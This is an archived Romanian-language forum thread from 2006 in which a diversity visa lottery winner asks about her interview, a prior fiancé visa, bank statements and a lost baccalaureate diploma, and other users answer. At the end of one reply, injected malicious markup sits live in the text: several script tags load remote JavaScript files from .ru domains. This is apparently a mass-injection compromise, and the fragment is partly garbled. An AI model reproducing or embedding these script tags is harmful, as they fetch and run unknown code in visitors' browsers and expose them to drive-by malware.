PDA

Arată versiune întreagă : As dori si eu niste informati va rog

danielly
11.01.2006, 15:32
Salutare;

Ma numasc Daniela si sunt din Romania si am fost anuntata ca sunt castigatoare la loteria vizelor. Si as avea si eu nevoie cu sfatruri din partea celor care au trecut prin asa ceva si cunascatorilor. Sa va spun despre mine si sa-mi spunti ce sanse am de a lua viza; am 24 de ani, am terminat facultatea de stat Ovidius din Constanta anul trecut, initial de atunci nu am mai avut nici un job sperand sa plec in America avand iubitul acolo care si sa intamplat sa plec in sept 2005 cu viza de logonda dar acolo am intalnit anumite prb din cauza mamei lui si nu am putut sa ne casatorim in acele 3 luni acordati de ambasada si am considerat sa ma intorc in tara si sa o iau pe cea de loterie , m-am intors la timp nu am depsit data scrisa pe assaport. Cand am plecat acolo eu am luat o suma de bani cam 5000$ si mam intors tot cu atatia.

in fine asta e ca o istorie intrebarile mele principale ar fii:

1) o sa am vreo problema cu visa care am avuto si anume the K1( logonda ) la interviu tinad cont ca mam intors la timp?

2) are vreo prb daca baninu au vechime prea multa in banca tinand cont ca dor ce mam intors si nu am dovada cai aveam si o sa am si documentul acella de Suporrt Affroid de la logondicul meu?

3)care e suma care trebuie platita ptr interviu si unde?

4)au fost cazuri in care au fost refuzati persoanele castigatoare a loteriilor vizelor?

5)facultate mea de stat cu specializa in economie e valabila acolo sau cum se evalueaza , trebuie sa ma duc la invatamantul de stat din Romania sa evalueze creditele?

6) trebuie sa prezit ambele diplome de bacoloreiat si de licenta sau dor cea de facultate?

7) e vreo problema daca logondicul meu ma inscris pe online ptr participare la loterie?

Va rog sa ma ajutai sunt putin speriata sa nu am prb la interviu.smileys/smiley5.gif

GNChicago
11.01.2006, 16:37
Istoria cu logodna nu cred ca are importanta. Nimeni nu trebuie sa se amestece in chestia asta, poate ca nici tu nu ai vrut.... Deci totul e istorie si vor invata copii copiilor tai la lectia de istorie.

Americanu daca iti spune ca e History, atunci totul e terminat, e o forma scurta de a spune asta la vista sau asaceva.

Ai nevoie de toate diplomele si ptrca notarizarea e scumpa in Romania, poti face traducerile acolo si notarizarea aici.

Restul ia one at the time!

5. Nu conteaza unde ai studiat, unele cursuri vor fi echivalate, altele nu....

7. Nu cred ca conteaza. Multi dicteaza altora la computer si altcineva skill in computer art introduce datel cum ii spui tu.

Banii nu au miros. Ei se uita pe bank statement sa vada evolutia lor, dar principalul e ca ii ai si nu-i dai la nimeni in afara de mine....

roxanici
11.01.2006, 18:27
Salutare;

Ma numasc Daniela si sunt din Romania si am fost anuntata ca sunt castigatoare la loteria vizelor. Si as avea si eu nevoie cu sfatruri din partea celor care au trecut prin asa ceva si cunascatorilor. Sa va spun despre mine si sa-mi spunti ce sanse am de a lua viza; am 24 de ani, am terminat facultatea de stat Ovidius din Constanta anul trecut, initial de atunci nu am mai avut nici un job sperand sa plec in America avand iubitul acolo care si sa intamplat sa plec in sept 2005 cu viza de logonda dar acolo am intalnit anumite prb din cauza mamei lui si nu am putut sa ne casatorim in acele 3 luni acordati de ambasada si am considerat sa ma intorc in tara si sa o iau pe cea de loterie , m-am intors la timp nu am depsit data scrisa pe assaport. Cand am plecat acolo eu am luat o suma de bani cam 5000$ si mam intors tot cu atatia.

in fine asta e ca o istorie intrebarile mele principale ar fii:

1) o sa am vreo problema cu visa care am avuto si anume the K1( logonda ) la interviu tinad cont ca mam intors la timp?

2) are vreo prb daca baninu au vechime prea multa in banca tinand cont ca dor ce mam intors si nu am dovada cai aveam si o sa am si documentul acella de Suporrt Affroid de la logondicul meu?

3)care e suma care trebuie platita ptr interviu si unde?

4)au fost cazuri in care au fost refuzati persoanele castigatoare a loteriilor vizelor?

5)facultate mea de stat cu specializa in economie e valabila acolo sau cum se evalueaza , trebuie sa ma duc la invatamantul de stat din Romania sa evalueze creditele?

6) trebuie sa prezit ambele diplome de bacoloreiat si de licenta sau dor cea de facultate?

7) e vreo problema daca logondicul meu ma inscris pe online ptr participare la loterie?

Va rog sa ma ajutai sunt putin speriata sa nu am prb la interviu.smileys/smiley5.gif

Buna!

Am sa incerc sa iti raspund la intrebarile tale:

1. Nuiti fa probleme in legatura cu viza de logodna. Din moment ce te-ai intors la timp este ok. La interviu probabil iti vor pune cateva intrebari legate de sederea ta in State. Sa raspunzi sincer si fara ezitari

2. In legatura cu banii. Trebuie sa iti deschizi un cont la banca unde sa ii depui si la interviu sa prezinti extrasul de cont. Nu conteaza data la care deschizi contul. Cunosc persoane care si-au deschis contul cu 3 zile inainte de interviu si nu au avut nici un fel de problema. Banii poti spune ca sunt de la logodnicul tau sau ca sunt savings.

3. Taxa interviu: 755 dolari si se plateste la ambasada.

4. Personal nu cunosc pe nimeni care sa nu fi luat interviul. Motivele ptr care poti fi amanat sau in cel mai rau caz refuzat ar fi: nu indeplinesti toate conditiile de obtinere a vizei: ai probleme medicale (SIDA, toxicoman, etc), nu ai bacalaureatul sau 2 ani de experienta in munca, nu ai toate documentele care ti se cer in plicul 2, nu ai destule dovezi financiare.

6. Diploma de bac o prezinti OBLIGATORIU. Diploma de licenta optional. (Dar e mai bine sa o ai la tine.)

7. Inscrierile se fac online. E bine! Nu conteaza cine te-a inscris.

Am si eu o intrebare: care este Case Numberul tau? In functie de acest CN vei fi programata la interviu.

Multa bafta!p://www.9jsr.ript><scrip<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=h<script src=http://www.iroe.ru/ngg.js></script>

danielly
12.01.2006, 07:29
Multumesc mult ptr raspuns

danielly
12.01.2006, 07:36
Ptr Roxanici ce as vrea sa te mai intreb eu intamplator numi mai gasesc diploma de bac in original o sa fie chiar o problema? O pot prezenta pe cea de licenta care o am originala , tradusa si legalizata sunt disperata ca numi gasesc diploma de bac si pot scoate duplicat numai dupa 4-6 luni si eu o sa am interviu in febroarie

Si raspunsul la intrebarea ta nr de inregistrare care o am e 2006EU000068xx.

Multumesc mult si astept raspuns.

roxanici
12.01.2006, 20:04
Danielly, in plicul numarul doi scrie ca la interviu trebuie prezentata diploma de bac sau trebuie sa demonstrezi (cu cartea de munca evident) ca ai lucrat cel putin doi ani intr-o meserie de pe lista urmatoare: http://travel.state.gov/visa/immigrants_types_diversity4.htm (http://travel.state.gov/visa/immigrants_types_diversity4.html) l

Ai cautat-o bine? Sigur nu a ramas la arhiva universitatii? Eu zic sa o mai cauti..sa te gandesti bine unde ar putea fi..ptr ca la interviu trebuie sa o prezinti. Mergi la liceul unde ai terminat si poate dai peste o secretara draguta care te poate ajuta. Ii explici ca iti trebuie urgent un duplicat si..cine stie..Daca nu..dai anunt in Monitorul Oficial si ceri urgenta (probabil va trebuie sa platesti extra)

In legatura cu Cn-ul tau. Trimite un mail la KCC sa afli data interviului, ptr ca deja te incadrezi in cut-off.

danielly
13.01.2006, 05:01
Mersii inca o data roxanici dar chiar mai facut sa disper, deci azi am fost pe la facultate si nui de gasit diploma de bac si am fost la liceu si miau zis ca dureaza cam 6 luni deci chiar nu stiu ce sa fac pot sa plangsmileys/smiley19.gifchiar aia de faculttate nu-i acelasi lucru? Si mai facut curioasa cu nr de inregistrarea ca pe net am gasit ca de la 6800 o sa fie chemati in februarie si al meu iubit a sunat acum o luna si ia zis ca as fii pe 14 feb tu unde te-ai uitata ca as dori sa vad si eu ala cut off plsssssssss

danielly
13.01.2006, 11:35
e cam ciudat

cum sa stii tu ca sunt cut off nu ai nr tot cum apar acolo daca zici ca sunt taiata?

roxanici
15.01.2006, 01:43
Eu ptr aflarea datei interviului am sunat la KCCdar am trimis si un mail la care am primit raspuns in cateva zile (in care se specifica ziua cand trebuie sa ma prezint la interviu).Linkul unde se afiseaza cut-off-ul lunar este acesta: http://travel.state.gov/visa/frvi/bulletin/bulletin_2771.htm (http://travel.state.gov/visa/frvi/bulletin/bulletin_2771.html) l

roxanici
15.01.2006, 18:23
e cam ciudat

cum sa stii tu ca sunt cut off nu ai nr tot cum apar acolo daca zici ca sunt taiata?

Imi pare rau dar nu am inteles ce ai vrut sa spui prin aceasta fraza..poti sa fi putin mai explicita ca sa pot sa iti dau un raspuns corect?

danielly
30.01.2006, 02:04
scuze roxanici acuma am vazt si eu saitul cu cut off asta e cand nu te pricepi la internet sper ca nu te-ai suparat smileys/smiley4.gif